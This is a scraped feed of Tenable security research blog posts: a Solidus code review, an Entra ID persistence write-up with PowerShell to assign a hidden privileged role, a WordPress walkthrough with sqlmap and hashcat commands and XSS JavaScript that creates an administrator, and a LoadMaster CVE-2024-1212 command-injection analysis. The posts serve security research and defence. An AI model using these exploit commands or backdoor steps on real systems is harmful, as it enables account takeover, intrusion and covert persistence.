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Yesterday — 10 June 2024Tenable TechBlog - Medium

Solidus — Code Review

Solidus — Code Review

As a Research Engineer at Tenable, we have several periods during the year to work on a subject of our choice, as long as it represents an interest for the team. For my part, I’ve chosen to carry out a code review on a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus which is an open-source eCommerce framework for industry trailblazers. Originally the project was a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.

Project selection

Solidus wasn’t my first choice, I originally wanted to select Zammad, which is a web-based open source helpdesk/customer support system also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because for many businesses, the support/ticketing component is quite critical, identifying a vulnerability in a project such as Zammad almost guarantees having an interesting vulnerability !

For various reasons, whether it’s on my professional or personal laptop, I need to run the project in a Docker, something that’s pretty common today for a web project but :

Zammad is a project that requires many bricks such as Elasticsearch, Memcached, PostgresQL & Redis and although the project provided a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of Github, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the Solidus Dockerfile supplied, but by browsing the issues and making some modifications on my own I was able to quickly launch the project.

Project started with bin/dev cmd

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture, although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this Framework is “Convention over Configuration”, which means that many choices are made for you, and means that all environments used will have similarities, which makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file !

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files :

  • Admin Namespace SolidusAdmin::Engine
  • Backend Namespace Spree::Core::Engine
  • API Namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means “The GET request on /orders/mine” will be sent to the “mine” method of the “Orders” controller (we don’t care about the “as: ‘my_orders” here).

module Spree
module Api
class OrdersController < Spree::Api::BaseController
def mine
if current_api_user
@orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
@orders = paginate(@orders)
render "spree/api/errors/unauthorized", status: :unauthorized

Or via the CRUD system using something like :

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation :

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs :

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • ̶D̶E̶L̶E̶T̶E̶ ̶/̶c̶u̶s̶t̶o̶m̶e̶r̶_̶r̶e̶t̶u̶r̶n̶s̶/̶:̶i̶d̶ is ignored because of “except: :destroy”

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Not to mention all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a Github Action, the results are then directly visible in the Security tab.

Extract of vulnerabilities identified by CodeQL

Processing the results from all the tools takes a lot of time, many of them are redundant and I have also observed that some paid tools are in fact just overlays of open source tools such as Semgrep (the results being exactly the same / the same phrases).

Special mention to Brakeman, which is a tool dedicated to the analysis of Ruby on Rails code, the tool allows you to quickly and simply have some interesting path to explore in a readable manner.

Extract of vulnerabilities identified by Brakeman

Without going over all the discoveries that I have put aside (paths to explore). Some vulnerabilities are quick to rule out. Take for example the discovery “Polynomial regular expression used on uncontrolled data” from CodeQL :

In addition to seeming not exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to a user input but to the call of a method which returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not and for that there are several methods.

On the main shop page, it is possible to search for the following patterns :

<p>Powered by <a href="">Solidus</a></p>

Or check if the following JS functions are available :


Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns :

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others and these do not make it possible to determine the version of Solidus.

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user and given the number of routes available, I thought I’d spend a little time there, but I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process. :

Once the order is placed, user actions are rather limited

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited, apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.) there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP, this configuration must be done directly in the Rails project config

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e. the latest version available so I didn’t spend too much time on this part which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined

  • SuperUser : Namely the administrator, which therefore allows access to all the functionalities
  • DefaultCustomer : The default role assigned during registration, the basic role simply allowing you to make purchases on the site

To manage this brick, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered as a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => “_blank”` which therefore makes an XSS difficult to exploit (or via crazy combinations such as click wheel) I found it interesting to dig into this part of the code and understand how to achieve this injection simply because this concerns the administration part.

Here’s how this vulnerability could be exploited :

1/ An administrator must modify the shipping methods to add the `javascript:alert(document.domain)` as tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload which can be triggered via a click wheel

By default, the only role being possible being an administrator the only possibility is that an administrator traps another administrator… in other words, far from being interesting

Note : According to Solidus documentation, in a configuration that is not the basic one, it would be possible for a user with less privileges to exploit this vulnerability

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response.
The vulnerability was published under

2/ Solidus, State Machine & Race Conditions

In an ecommerce site, I find that testing race conditions is a good thing because certain features are conducive to this test, such as discount tickets.

But before talking about race condition, we must understand the concept of State machine

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

If I talk about that, it’s because the Solidus documentation has a chapter dedicated to that and I think it’s quite rare to highlight it !

Now we can try to see if any race conditions are hidden in the use of a promotion code.

This section of the code being still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in the case of a whitebox audit, it is sometimes easier to trace the code from an error in the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

Then simply look for the error in the entire project code and then trace its use backwards to the method which checks the use of the coupon

It’s quite difficult to go into detail and explain all the checks but we can summarize by simply explaining that a coupon is associated with a specific order and as soon as we try to apply a new coupon, the code checks if it is already associated with the order or not.

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but we understand from reading these lines that the main building blocks of Solidus are rather robust and that on a default installation, I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. On solidus, we can arrange the extensions according to 3 types

  • Official integrations : Listed on the main website, we mainly find extensions concerning payments
  • Community Extensions : Listed on a dedicated Github repository, we find various and varied extensions that are more or less maintained
  • Others Extensions : Extensions found elsewhere, but there’s no guarantee that they’ll work or that they’ll be supported

Almost all official extensions require integration with a 3rd party and will therefore make requests on a third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions to test a few extensions for which I would have liked to have native functionality on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for 2 years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed …

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins such as Solidus Friendly Promotions, according to its documentation, replace Solidus cores features and are therefore inherently more likely to introduce a vulnerability.


Presenting all the tests that can and have been carried out is also far too time-consuming. Code analysis really is time-consuming, so to claim that I’ve been exhaustive and analyzed the whole application would be false but, after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to have been able to detail a few vulnerabilities, but this blog post tends to show that you can’t always be fruitful.

Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Before yesterdayTenable TechBlog - Medium

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID


The “Directory Synchronization Accounts” Entra role is very powerful (allowing privilege escalation to the Global Administrator role) while being hidden in Azure portal and Entra admin center, in addition to being poorly documented, making it a perfect stealthy backdoor for persistence in Entra ID 🙈

This was discovered by Tenable Research while working on identity security.

“Directory Synchronization Accounts” role

Permissions inside Microsoft Entra ID (e.g. reset user password, change group membership, create applications, etc.) are granted through Entra roles. This article focuses on the Directory Synchronization Accounts role among the around 100 built-in Entra roles. This role has the ID “d29b2b05–8046–44ba-8758–1e26182fcf32”, it has the PRIVILEGED label that was recently introduced, and its description is:

This is a privileged role. Do not use. This role is automatically assigned to the Microsoft Entra Connect service, and is not intended or supported for any other use.

A privileged role that one should not use? It sounds like an invitation to me! 😉

The documentation seems to say that this special role cannot be freely assigned:

This special built-in role can’t be granted outside of the Microsoft Entra Connect wizard

This is incorrect since it can be assigned technically, even if it shouldn’t be (pull-request to fix this).

Privileged role

I confirm that the role is privileged because, of course, it contains some permissions marked as privileged, but also because it has implicit permissions in the private undocumented “Azure AD Synchronization” API (not to be confused with the public “Microsoft Entra Synchronization” API).

These permissions allow escalation up to the Global Administrator role using several methods that we will see later💥

Normal usage by Microsoft Entra Connect

The normal usage of this role is indeed to be assigned to the Entra service account used by “Entra Connect” (formerly “Azure AD Connect”), i.e. the user named “On-Premises Directory Synchronization Service Account” which has a UPN with this syntax: “SYNC_<name of the on-prem server where Entra Connect runs>_<random id>”.

Even though it is not documented (I’ve proposed a pull-request to fix this), this role is also assigned to the similar Entra service account used by “Entra Cloud Sync” (formerly “Azure AD Connect Cloud Sync”), i.e. the user also named “On-Premises Directory Synchronization Service Account” but which has a UPN with this syntax: “[email protected]” instead.

This role grants to the Entra service user, the permissions it requires to perform its inter-directory provisioning duties, such as creating/updating hybrid Entra users from the on-premises AD users, updating their password in Entra when it changes in AD with Password Hash Sync enabled, etc.

Security defaults

Security defaults is a feature in Entra ID allowing to activate multiple security features at once to increase security, notably requiring Multi-Factor Authentication (MFA). However, as documented by Microsoft and highlighted by Dr. Nestori Syynimaa @DrAzureAD, the “Directory Synchronization Accounts” role assignees are excluded from security defaults!

Dr. Nestori Syynimaa on Twitter: "Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 / Twitter"

Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥

Nestori also confirmed that the limitation concerns all those assigned to the role (I’ve proposed a pull-request to update the doc).

Once again, I understand the need for this since the legitimate accounts are user accounts, thus subject to MFA rules. However, this could be abused by a malicious administrator who wants to avoid MFA 😉

Hidden role

Here is the proof that this role is hidden in the Azure portal / Entra admin center. See this Entra Connect service account apparently having 1 role assigned:

But no results are shown in the “Assigned roles” menu (same in the other tabs, e.g. “Eligible assignments”) 🤔:

Actually I tested it in several of my tenants and I noticed that the role was displayed in another tenant:

I suppose that the portal is running a different version of the code, or due to a feature-flag or A/B testing, because this one uses the MS Graph API (on to list the role assignments:

Whereas the other uses a private API (on

I noticed this difference last year when I initially reported this behavior to MSRC.

And what about the “Roles and administrators” menu? We should be able to see the “Directory Synchronization Accounts” built-in role, isn’t it? Well, as you guessed, it’s hidden too 🙈 (in all my tenants: no difference here):

Note that for those that prefer it, the observations are identical in the Entra admin center.

I understand that Microsoft decided to hide it since this is a technical role that isn’t meant to be assigned by customers. A handful of other similar roles are hidden too. However, from a security perspective, I find it dangerous because organizations cannot use the Microsoft portals to see who may have this privileged role assigned illegitimately 😨! I reported this concern to MSRC (reference VULN-083495) last year, who confirmed that it was not a security issue and that they created a feature request to eventually improve the UX to help customers understand it.

This is the reason why I consider that this privileged role is a stealthy persistence method for attackers who compromised an Entra tenant.

Abuse methods

We will see how the security principals (users, but also service principals!) assigned to the “Directory Synchronization Accounts” role can elevate their privileges to the Global Administrator role! 😎

Password reset

There are several articles online explaining that the Entra Connect (ex- Azure AD Connect) service account in Entra ID is allowed to reset user passwords. One example is the “Unnoticed sidekick: Getting access to cloud as an on-prem admin” article by Dr. Nestori Syynimaa where “Set-AADIntUserPassword” is used.

I suppose this is allowed by the “” Entra permission of the role, but I cannot check for sure.

There are some limitations though:

  • Only hybrid accounts (synchronized from on-premises AD) can be targeted (which was only recently fixed)
  • Only if Password-Hash Sync (PHS) is enabled, but the role allows to enable it
  • Only via the private “Azure AD Synchronization” API, that is implemented in AADInternals, whose endpoint is and it must not be confused with other similarly named APIs: the public Microsoft Entra Synchronization API, or the private Azure AD Provisioning API. So, the reset must be done using the Set-AADIntUserPassword AADInternals PowerShell cmdlet.
  • Not exploitable if the target has MFA or FIDO2 authentication enforced since the password can still be reset but authentication won’t be possible

Add credentials to privileged application / service principal

The other interesting method was described by Fabian Bader in this article: “From on-prem to Global Admin without password reset”. I recommend that you read the original article, but in a summary, the idea is to identify an application or service principal having powerful Microsoft Graph API permissions, then abuse the “” or “” Entra permissions, which the “Directory Synchronization Accounts” role holds, to add credentials to it. Thus allowing to authenticate as the service principal, and abuse the appropriate method corresponding to the dangerous Graph API permission to escalate to Global Admin.

This method was also described by Dirk-jan Mollema in this article: “Azure AD privilege escalation — Taking over default application permissions as Application Admin“.

Manage role assignment

Since one cannot manage this role using Azure portal nor Entra admin center, how to list or manage its assignees? We will see how, using the Microsoft Graph PowerShell SDK since the Azure AD PowerShell module is now deprecated.

List role assignees

The Get-MgDirectoryRoleMember command allows to list the security principals assigned to a role. We reference the “Directory Synchronization Accounts” role by its well-known ID (as seen in the beginning) instead of its name for better reliability:

Connect-MgGraph -Scopes "Domain.Read.All"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Get-MgDirectoryRoleMember -DirectoryRoleId $dirSync.Id | Format-List *

The output is not very consistent because role assignees are “security principals” which can be either users, groups, or service principals (undocumented 😉), so different types of objects.

In this example I have specified the “Domain.Read.All” Graph API permission when connecting, because it is usually already delegated, but the least privileged permission is actually “RoleManagement.Read.Directory”.

Add role assignment

And how an attacker wishing to abuse this role for stealthy persistence would assign it? With the New-MgRoleManagementDirectoryRoleAssignment command:

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
$hacker = Get-MgUser -UserId [email protected]
New-MgRoleManagementDirectoryRoleAssignment -RoleDefinitionId $dirSync.Id -PrincipalId $hacker.Id -DirectoryScopeId "/"

In this example, I have specified the “RoleManagement.ReadWrite.Directory” Graph API permission when connecting, which is the least privileged permission.

Also, if this role has never been used in the tenant (for example if Entra Connect / Entra Cloud Sync was never configured), the role instance must be created from the role template before usage, with this command:

New-MgDirectoryRole -RoleTemplateId "d29b2b05-8046-44ba-8758-1e26182fcf32"

Remove role assignment

A malicious role assignment, or one which is a leftover from when the Entra tenant was hybrid, can be removed with the Remove-MgDirectoryRoleMemberByRef command:

$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Remove-MgDirectoryRoleMemberByRef -DirectoryRoleId $dirSync.Id -DirectoryObjectId <object ID of the assignee to remove>


➡️ As a conclusion, my recommendation is to list and monitor the security principals assigned to the “Directory Synchronization Accounts” role. Since you cannot use the Azure portal / Entra admin center to see those, you must use the Graph API (or the deprecated Azure AD PowerShell module) as described above. Thankfully, you will soon be able list all role assignees from the comfort of Tenable One or Tenable Identity Exposure.

🕵️ Any unrecognized suspicious assignee must be investigated because it may be a potential backdoor. Does it look like a legitimate Entra Connect or Entra Cloud Sync service user? Does its creation date correspond to the set up date of hybrid synchronization? Etc. Tenable Identity Exposure will soon add an Indicator of Exposure (IoE) allowing automatic identification of those suspicious “Directory Synchronization Accounts” role assignments, including more detailed recommendations.

🛡️ As a safety net, you can also follow Dr. Nestori Syynimaa’s recommendation to create a Conditional Access policy to block all users with that role, except the real legitimate synchronization user.

🤞 Finally, I hope that Microsoft will soon find a solution, with a better user experience, allowing to discourage the usage of the “Directory Synchronization Accounts” role, without resorting to hiding it, so customers can use the Azure portal or Entra admin center to see the role and its assignees.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

WordPress : From vulnerability identification to compromising

WordPress : From vulnerability identification to compromising

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

Although, as demonstrated by the recent CVE-2024–4439 vulnerability, WordPress is not flawless, it remains an extremely robust solution, and from an attacker’s point of view, it’s much easier to find another entry point to compromise a WordPress instance.

Luckily (or not) this other vector exists and it’s WordPress plugins. With nearly 60,000 free extensions available, any one of them can represent a possible gateway to a complete compromise of your instance.

Based on our day-to-day work at Tenable Research, we will illustrate this in this article through different steps/scenarios on a real WordPress instance.

1/ Identify available WordPress plugins

When a WordPress plugin is created, developers can rely on a number of standards. Among these standards is the “Readme.txt” file, which many plugins respect.

This file can be used by an attacker to identify whether or not a plugin is available. In the knowledge that this file is most of the time available at the URL “http://WORDPRESS/wp-content/plugins/[PLUGIN SLUG]/readme.txt” using a wordlist of plugin names, an attacker can perform bruteforce to identify available plugins.

We can see here that we have two plugins installed

If you take a closer look at the second one, you’ll see that it’s installed in version 2.9.7

Note : Sometimes the stable tag is empty but you can still look at the changelog section

A quick search reveals that this plugin is vulnerable to an unauthenticated SQL injection !

Now that we’ve identified the available plugins and that one of them is vulnerable, we’ll now look at how to compromise the WordPress instance.

2/ From SQL Injection to complete compromission

First, you need to understand the vulnerability in order to understand how to exploit it. Either by

  • Downloading a vulnerable version, looking at the code and trying to reproduce the vulnerability
  • Or a public exploit is already available

In our case, the vulnerability is detailed in this article and the command to exploit it via the SQLmap tool is provided.

With SQL Injection, among the available techniques, the most common consists of extracting the users and their password hash.

sqlmap -u "" -p code --dbms=MySQL -dump -T wp_users -C user_login,user_pass
[14:59:53] [INFO] GET parameter 'code' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
GET parameter 'code' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
Parameter: code (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: rest_route=/pmpro/v1/order&code=a' AND (SELECT 1804 FROM (SELECT(SLEEP(5)))jJJd) AND 'MnNj'='MnNj
Database: wasvwa
Table: wp_users
[2 entries]
| user_login | user_pass |
| subscriber | $P$BQG8CvNGjGGbMmr5KxN8p3BnwdgMbf0 |
| admin | $P$BUwEadKq2ID1rSD6/G4/tTf85WONEf1 |

Note : Users are usually stored in the ‘wp_users’ table, with ‘wp_’ being the basic prefix. If this is not the case, you can search for the table name/prefix by listing the columns with the following SQLmap command :

sqlmap -u "" -p code --dbms=MySQL —-columns
[15:50:38] [INFO] retrieved: wp_pmpro_membership_ordermeta

Now that we have recovered the users and the hashes we need to find the password in clear text. We will not go into the details of this step here and simply use hashcat with a wordlist to recover the password in plain text.

The only important option to understand here is `-m 400` which translates as “hash mode 400”. The number 400 corresponds to the password hashing technique used by WordPress. In the background, WordPress uses the ‘wp_hash_password()’ function which uses the PHPass library and, in short, returns an MD5 hashed password with additional security mechanisms.

hashcat -m 400 -a 0 -o cracked.txt hash.txt wordlist.txt
cat cracked.txt
> $P$BUwEadKq2ID1rSD6/G4/tTf85WONEf1:password

To summarize, we identified the available plugins, one of them is in a version vulnerable to an unauthenticated SQL injection which we exploited to retrieve the list of available users with their hashes which we bruteforce to recover the clear password of the administrator !

The next step is therefore to authenticate, to do this, by default, the URL of the WordPress admin panel is available at the URL /wp-admin/

Except that in our case, we are redirected to a 404! If we return to the list of installed plugins, we remember that “WPS Hide Login” is installed.

WPS Hide Login is a very light plugin that lets you easily and safely change the url of the login form page to anything you want.

Once again, we will be able to use our SQL injection to find the real login URL. For this plugin, what we are looking for is stored in column ‘option_value’ of the table ‘wp_options’

sqlmap -u "" -p code --dbms=MySQL -dump -T wp_options -C option_value --where "option_name='whl_page'"
Table: wp_options
[1 entry]
| option_value |
| hidden_login |

We can now access the login page and authenticate.

Once authenticated, to obtain an RCE, among the available techniques the two simplest are as follows :

  • Upload a new malicious plugin to execute code
  • Edit an existing file to insert malicious code

The second is the simplest because everything is already there by default, you just have to go to “Tools > Theme File Editor > Themes Functions” and insert a piece of PHP code allowing you to execute code.

Once saved, we can therefore execute arbitrary code on our WordPress instance

3/ From Cross-Site Scripting to complete compromission

Less direct than an SQLi, an XSS can also compromise a WordPress instance, and for this example we’ll take the WP RSS Aggregator version 4.23.8.

This plugin is vulnerable to a reflected XSS and therefore requires that the URL containing the payload be transmitted directly to the administrator.

The original request can be obtained by going to the plugin page and clicking on the “Dismiss this notification” button :

On the code side, in version below 4.23.9 of WP RSS Aggregator, this vulnerability is present due to the use of the `sprintf()` function, which is used to display the response to the user.

The notice_id value is inserted into the message without filtering allowing to insert arbitrary HTML code :

There are several XSS techniques that can be used to take control of an instance, the two most common being :

  • Add a new administrator
  • Modify page code directly to insert a webshell

The code below, for example, is used to create a new administrator :

requestURL = "/wp-admin/user-new.php";
nonceRegex = /ser" value="([^"]*?)"/g;

xhr = new XMLHttpRequest();"GET", requestURL, false);

nonceMatch = nonceRegex.exec(xhr.responseText);
nonce = nonceMatch[1];
params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&[email protected]&pass1=password&pass2=password&role=administrator";

xhr = new XMLHttpRequest();"POST", requestURL, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

Simply save the code to a file on a publicly accessible server, send the URL containing our payload (loading our remote script) and you’re done.

A new administrator is added :

As a side note, the plugin author has corrected the vulnerability by escaping the HTML code of Exceptions messages :

Which corrects the vulnerability :

This article shows how to identify available plugins, compromise an instance via SQL Injection while bypassing a defense mechanism that hides the login URL, and also how to create a new administrator via Cross-Site Scripting.

Obviously, this article is only an introduction and does not describe all possible cases or less likely/common scenarios, such as the possibility of creating an administrator via SQL Injection.

However, we understand that although WordPress is reputed to be robust, plugins are not necessarily so and can therefore allow your instance to be compromised. It is therefore essential to review the plugins you install, check that they are up to date and if possible enable automatic updates.

WordPress : From vulnerability identification to compromising was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Another Path to Exploiting CVE-2024-1212 in Progress Kemp LoadMaster

By: Ben Smith
2 April 2024 at 17:18


Rhino Labs discovered a pre-authentication command injection vulnerability in the Progress Kemp LoadMaster. LoadMaster is a load balancer product that comes in many different flavors and even has a free version. The flaw exists in the LoadMaster API. When an API request is received to either the ‘/access’ or ‘/accessv2’ endpoint, the embedded min-httpd server calls a script which in turn calls the access binary with the HTTP request info. The vulnerability works even when the API is disabled.

Rhino Labs showed that attacker controlled data is read by the access binary when sending an enableapi command to the /access endpoint. The attacker controlled data exists as the ‘username’ in the Authorization header. The username value is put into the REMOTE_USER environment variable. The value stored in REMOTE_USER is retrieved by the access binary and ends up as part of a string passed to a system() call. The system call executes the validuser binary and a carefully crafted payload allows us to inject commands into the bash shell.

GET request showing the resulting bash command. The response shows a bash syntax error that indicates the command line that was executed
GET request showing the resulting bash command

We also found that the REMOTE_PASS environment variable is exploitable in the same way here via the Authorization header.

This command execution is possible via any API command if the API is enabled. As Rhino Labs points out, When sending a GET request to the access API indicating the enableapi command, the access binary skips checking whether the API is enabled first or not, and the Authorization header is checked right away.


While investigating this vulnerability, I noticed that LoadMaster has two APIs, the v1 API indicated above, and a v2 API that functions via the /accessv2 endpoint and JSON data. The access binary still processes these requests, but a slightly different path is followed. The logic of the main function is largely duplicated as a new function and called if the APIv2 is requested. That function then performs the same checks as above, with the slight exception that it will decode the API and pass the values of the apiuser and apipass keys to the same system call. So, we have another path to the same exposure:

This is the second exploitable path via the APIv2. A POST request is sent to the LoadMaster APIv2, and a response indicates the output of the command we injected.
POST request to the LoadMaster APIv2, also exploitable

While we can still control the password variable, it’s no longer exploitable here. Somewhere along the path the password string gets converted to base64 before being passed through the system() call, nullifying any injected quotes.

POST request to the APIv2 showing that apipass is base64 encoded, effectively removing any single quotes

We can see below that the verify_perms function calls validu() with REMOTE_USER and REMOTE_PASS data in the APIv1 implementation; in the API v2 implementation the apiuser and apipass data is passed to validu() from the APIv2 JSON.

Screenshot of the Ghidra decompilation showing the two different paths for API and APIv2
Ghidra decompilation showing API and APIv2 paths


The patch solves these flaws quite simply by examining the username and password strings in the Authorization header for single quotes. If they contain a single quote, the patched function will truncate them just before the first single quote. Decompiling the patched access binary with Ghidra, we can see this:

Ghidra decompilation of the patched validu function. It shows the new function call and then the ‘validuser’ string being concatenated and then the system() call after.
Ghidra decompilation of the patched validu function
Code from Ghidra decompilation of the function added by the patch. The function loops over each character of the input string, and if it’s a single quote, it is replaced with a null terminator.
Ghidra decompilation of the function in the patch that null terminates strings at the first single quote

Here we see the addition of the new function call for both username and password. The function loops over each character in the input string and if it is a single quote, it’s changed to a \0, null terminating the string.

Another Way to Test: Emulation

Even though we’ve got x86 linux binaries, we can’t run them natively on another linux machine due to potential library and ABI issues. Regardless, we can extract the filesystem and use a chroot and qemu to emulate the environment. Once we’ve extracted the filesystem, we can mount the ext2 filesystem ourselves:

sudo mount -t ext2 -o loop,exec unpatched.ext2 mnt/

Now we can explore the filesystem and execute binaries.

This provides us with a quick offline method to test our assumptions around injection. For instance, as we mentioned, the access binary is exploitable via the REMOTE_USER parameter:

Screenshot of a bash shell showing how we can emulate the access binary to test various different command injections.
Emulating binaries locally to easily test injection assumptions

